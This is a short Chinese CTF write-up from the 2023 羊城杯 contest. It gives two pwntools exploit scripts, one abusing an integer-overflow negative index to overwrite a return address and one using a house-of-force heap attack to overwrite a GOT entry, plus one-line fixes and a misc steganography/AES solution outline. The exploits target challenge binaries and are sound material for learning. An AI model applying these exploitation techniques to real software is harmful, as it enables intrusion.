2023羊城杯部分wp

比赛时脑抽了,背大锅呜呜呜,简单写写记录下

pwn

arrary_index_bank:

整数溢出,没什么好说的,“1”能泄露libc地址,“2”输入0x800000000000000f能修改返回地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64',os='linux')
p=process('./pwn')
#p=remote('10.1.114.2',10000)
elf=ELF('./index')
libc=ELF('./libc-2.31.so')

sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

sla('> ',b'1')
sla('Whose account?\n',b'-1')
p.recvuntil('accounts[-1] = ')
stack_addr=int(p.recvuntil('\n')[:-1],10)
stack_addr-=0x1426
success('stack_addr:'+hex(stack_addr))

win=stack_addr+0x1310+5
sla('> ',b'2')
sla('Whose account?\n',b'-9223372036854775801')
print(hex(win))
print(win)
#gdb.attach(p)
#pause()
sla('How much?\n',str(win))
#sla('> ',b'3')
#gdb.attach(p)
#pause()

p.interactive()

fix:修复判断正数跳转

ez_force:

house of force,比赛时脑子抽了,最后十分钟才想起force这个东西,fix阶段全修完才继续做,背大锅了,不然能混个三等。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64',os='linux')
p=process('./force')
elf=ELF('./force')
libc=ELF('./libc-2.23.so')

sa = lambda a,s:p.sendafter(a,s)
sla = lambda a,s:p.sendlineafter(a,s)
s = lambda a:p.send(a)
sl = lambda a:p.sendline(a)
ru = lambda s:p.recvuntil(s)
rc = lambda s:p.recv(s)
uu64=lambda data :u64(data.ljust(8,b'\x00'))
get_libc = lambda :u64(ru('\x7f')[-6:].ljust(8,b'\x00'))
plo = lambda o:p64(libc_base+o)

def add(index,size,context):
    sla('4.go away',b'1')
    sla('which index?\n',str(index))
    sla('how much space do u want?\n',str(size))
    sa('now what to write?\n',context)

add(0,0x10,b'/bin/sh\x00'+p64(0)*2+p64(0xffffffffffffffff))
p.recvuntil('the balckbroad on ')
heap_addr=int(p.recvuntil(' ')[:-1],16)
heap_base=heap_addr-0x1020
top_heap=heap_base+0x1030
put_got=elf.got['puts']
success('heap:'+hex(heap_base))
offest=-(top_heap-put_got)+0x10
success('offest:'+hex(offest))
add(1,offest,b'/bin/sh\x00')

add(2,0x10,b'\x47\x12\x8f')
sla('4.go away',b'1')
sla('which index?\n',b'3')
sla('how much space do u want?\n',b'32')

p.interactive()

fix:read的字节数控制跟创建堆块的大小一样

misc:

###easy00aes

emmmm,断网,有离线工具,一把梭了

简单写下思路:

foremost分离得到压缩包,密码是那张图片文件名base64,得到flag.jpg和key.txt,key.txt拿去零宽隐写得到key(大部分队伍卡在这一步,因为断网了),flag.jpg其实是png,改宽高得到密文,拿去aes解密即可得到flag